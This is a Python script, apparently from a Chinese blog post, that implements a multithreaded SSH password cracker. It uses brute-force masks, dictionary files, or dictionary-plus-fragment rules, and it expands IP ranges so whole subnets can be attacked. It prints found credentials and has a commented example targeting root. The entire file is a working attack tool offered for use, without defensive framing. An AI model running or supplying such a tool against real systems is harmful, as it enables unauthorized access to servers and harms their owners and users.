import argparse import json import string import threading import time from decimal import Decimal import paramiko
password.json位置 https://www.cnblogs.com/hudieren/p/15604059.html password_rule.json位置 https://www.cnblogs.com/hudieren/p/15604066.html
class SshScan(): classify_list = { '1': '暴力破解', '2': '字典', '3': '字典+规则集', } def __init__(self, classify, host, port, username, password, timeout=0): """ :param classify: 种类(暴力破解,字典,字典+规则集) :param host: 地址(eg:192.168.100.115) :param port: 端口 :param username: 用户名 :param password: 部分密码(eg:1、`1qaz??` 2、`???`)[问号为不知道的密码,密码可能几位写几位问号] :param new_password: 最终正确密码 :param password_name: 常用密码文件路径 :param password_list: 可能密码列表 :param max_threads_number: 最大线程数 :param max_threads: 限制线程的最大数量 """ self.classify = classify self.host = host self.port = port self.username = username self.password = password self.timeout = timeout self.new_password = None self.password_name = 'password.json' self.password_list = self.get_password() self.max_threads_number = 6 self.max_threads = threading.Semaphore(self.max_threads_number) # 限制线程的最大数量为4个 def __violence(self, charsetString, password, length, data=None): """ 暴力破解 :param charsetString: 字符集 :param password: 密码 :param length: `?`共有多少个 :param data: 最终返回的结果 :return: """ if data is None: data = [] new_data = [] if len(data) == 0: new_data = [password.replace('?', i, 1) for i in charsetString] else: for i in data: for j in charsetString: new_data.append(i.replace('?', j, 1)) length -= 1 if length == 0: return new_data else: return self.__violence(charsetString, password, length, new_data) def __gather(self): """ 密码集合 :return: """ with open(self.password_name, 'r', encoding='utf-8') as r: data = json.loads(r.read()) return data def get_password(self): """ 获取可能的密码 :return: 可能的密码列表 """ password_list = [] charsetString = string.digits + string.ascii_letters + string.punctuation length = self.password.count('?') if self.classify == '1': if length > 0: password_list = self.__violence(charsetString, self.password, length) else: password_list.append(self.password) elif self.classify == '2': password_list = self.__gather() elif self.classify == '3': data = self.__gather() pwd_list = self.password.split('?') data = [d for d in data if len(d) == len(self.password)] password_list = [] for d in data: for pwd in pwd_list: if pwd not in d: break else: password_list.append(d) return password_list def connect(self, password): with self.max_threads: # 实例化SSHClient client = paramiko.SSHClient() # 自动添加策略,保存服务器的主机名和密钥信息,如果不添加,那么不再本地know_hosts文件中记录的主机将无法连接 client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: # 连接SSH服务端,以用户名和密码进行认证 client.connect(self.host, self.port, username=self.username, password=password, timeout=10) print('密码正确:{}'.format(password)) self.new_password = password # 打开一个Channel并执行命令 # stdin, stdout, stderr = client.exec_command('ls') # result = stdout.readlines() # for i in result: # print(i.replace('\n', '')) # 关闭SSHClient client.close() except: print('密码错误:{}'.format(password)) client.close() time.sleep(self.timeout) def run(self): password_threads = [] for password in self.password_list: print(password) thread = threading.Thread(target=self.connect, args=(password,)) password_threads.append(thread) for thread in password_threads: if self.new_password: break else: thread.start() for thread in password_threads: if self.new_password: break else: thread.join() return self.new_password def opt(): parser = argparse.ArgumentParser(description='命令行中传入命令') parser.add_argument('-choice', required=True, help='<1:暴力破解;2:字典;3:字典+规则集>') parser.add_argument('-host', required=True, help='<host(主机)>') parser.add_argument('-port', type=int, help='<port(端口)>', default=22) parser.add_argument('-username', required=True, help='<username(用户名)>') parser.add_argument('-password', required=True, help='<password(密码)>') parser.add_argument('-timeout', type=int, help='<timeout(间隔时间)>', default=0) return parser.parse_args() def get_host(host): host_list = [] if '-' in host: h = host.split('-') left_host = h[0] left_host_list = left_host.split('.') right_host = h[1] right_host_list = right_host.split('.') for i in range(int(left_host_list[-1]), int(right_host_list[-1]) + 1): d = left_host_list[:3] + [str(i)] host_list.append('.'.join(d)) elif '*' in host: rule = { '0': {'m': 1, 'n': 255 + 1}, '1': {'m': 0, 'n': 99 + 1}, '2': {'m': 0, 'n': 9 + 1}, } h = host.split('.') r = h[-1].split('*')[0] for i in range(rule['{}'.format(len(r))]['m'], rule['{}'.format(len(r))]['n']): d = h[:3] + ['{}{}'.format(r, i)] host_list.append('.'.join(d)) else: host_list.append(host) return host_list def main(flag=False, **kwargs): start_time = Decimal(time.time()).quantize(Decimal("0.00")) if flag: classify = kwargs.get('classify') host = kwargs.get('host') port = kwargs.get('port') username = kwargs.get('username') password = kwargs.get('password') timeout = kwargs.get('timeout') if not timeout: timeout = 0 host_list = get_host(host) else: args = opt() classify = args.choice port = args.port username = args.username password = args.password timeout = args.timeout host_list = get_host(args.host) pwd = [] for host in host_list: password = SshScan(classify, host, port, username, password, timeout=timeout).run() d = { 'host': host, 'port': port, 'username': username, 'password': password, } pwd.append(d) end_time = Decimal(time.time()).quantize(Decimal("0.00")) print('结果为:\n{},\n用时:{}s'.format(pwd, end_time - start_time)) return {'result': pwd, 'hold_time': '{}s'.format(end_time - start_time)} if __name__ == '__main__': main() # start_time = int(time.time()) # classify = '1' # host = '192.168.79.136' # port = 22 # username = 'root' # password = '12345?' # # password = None # s = SshScan(classify, host, port, username, password) # password = s.run() # end_time = int(time.time()) # print('密码为:{},用时:{}s'.format(password, end_time - start_time))